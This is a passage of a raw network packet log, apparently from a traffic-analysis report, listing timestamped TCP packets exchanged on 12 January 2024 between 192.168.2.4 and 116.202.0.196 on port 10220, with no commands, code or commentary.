                                                                                                                                                                      Jan 12, 2024 06:48:15.837610006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837697983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837733984 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837781906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837785006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837842941 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837873936 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.837929964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.837965012 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838012934 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838047028 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838098049 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838119984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838167906 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838201046 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838248968 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838269949 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838320017 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838352919 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838406086 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838479996 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838548899 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838573933 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838607073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838653088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838686943 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838749886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838749886 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838809967 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838814974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838860989 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838872910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838906050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838910103 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838952065 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.838958979 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.838969946 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839010000 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839042902 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839070082 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839073896 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839090109 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839126110 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839127064 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839173079 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839205980 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839225054 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839293003 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839335918 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839346886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839346886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839346886 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839390993 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839400053 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839456081 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:15.839458942 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:15.839510918 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.013915062 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.013952971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.013986111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.013999939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014024973 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014045000 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014064074 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014144897 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014188051 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014218092 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014225960 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014241934 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014290094 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014544010 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014607906 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014609098 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014640093 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014656067 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014684916 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014731884 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014794111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014828920 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014906883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014910936 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.014959097 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.014957905 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015012980 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015022039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015053034 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015098095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015139103 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015146971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015214920 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015261889 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015285969 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015362024 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015409946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015429974 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015460968 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015484095 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015516996 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015597105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015652895 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015676022 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015723944 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.015742064 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.015789986 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016061068 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016123056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016156912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016202927 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016233921 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016336918 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016387939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016398907 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016431093 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016483068 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016530037 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016587019 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016634941 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016681910 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.016709089 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.016762972 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017072916 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017131090 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017152071 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017241955 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017290115 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017297983 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017345905 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017355919 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017388105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017433882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017601967 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017657995 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017662048 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017694950 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017708063 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017735958 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017815113 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017863035 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017919064 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.017968893 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.017971039 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018090010 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018194914 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018249035 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018279076 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018325090 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018336058 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018352985 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018381119 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018409967 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018420935 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018469095 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018500090 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018554926 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018572092 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018599987 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018627882 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018649101 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018693924 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018721104 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018765926 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018799067 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018862963 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018896103 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.018982887 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.018986940 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019021034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019037962 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.019072056 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019092083 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.019119978 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.019143105 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019177914 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019198895 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.019234896 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019283056 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.019315958 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.019465923 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.020035028 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.020092964 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.020421982 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.020476103 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.021552086 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.021610022 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.022140980 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.022200108 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.024249077 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.024308920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025193930 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025212049 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025228977 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025245905 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025253057 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025262117 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025276899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025279045 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025276899 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025295973 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025311947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025315046 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025335073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025340080 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025352955 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025369883 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025381088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025381088 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025386095 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025402069 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025404930 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025418997 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025429010 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025434971 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025450945 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025450945 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025465965 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025466919 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025485039 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025485992 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025506020 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025510073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025510073 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025522947 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025528908 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025538921 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025547981 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025556087 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025564909 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025573015 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025589943 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025599003 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025614023 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025615931 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025629044 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025631905 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025650024 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025656939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025672913 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025679111 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025690079 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025707006 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025717974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025717974 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025723934 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.025742054 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025742054 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.025758982 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026001930 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026020050 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026036978 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026050091 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026067019 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026083946 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026165962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026253939 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026360989 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026377916 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026393890 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026421070 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026452065 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026511908 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026535034 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026551962 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026566029 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026602030 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026602030 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026652098 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026669025 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026691914 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026700020 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026720047 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026747942 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.026850939 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.026901007 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027091026 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027117014 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027147055 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027175903 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027276039 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027301073 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027317047 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027362108 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027362108 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027410984 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027427912 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027468920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027468920 CET4975110220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:16.027621031 CET1022049751116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:16.027640104 CET1022049751116.202.0.196192.168.2.4
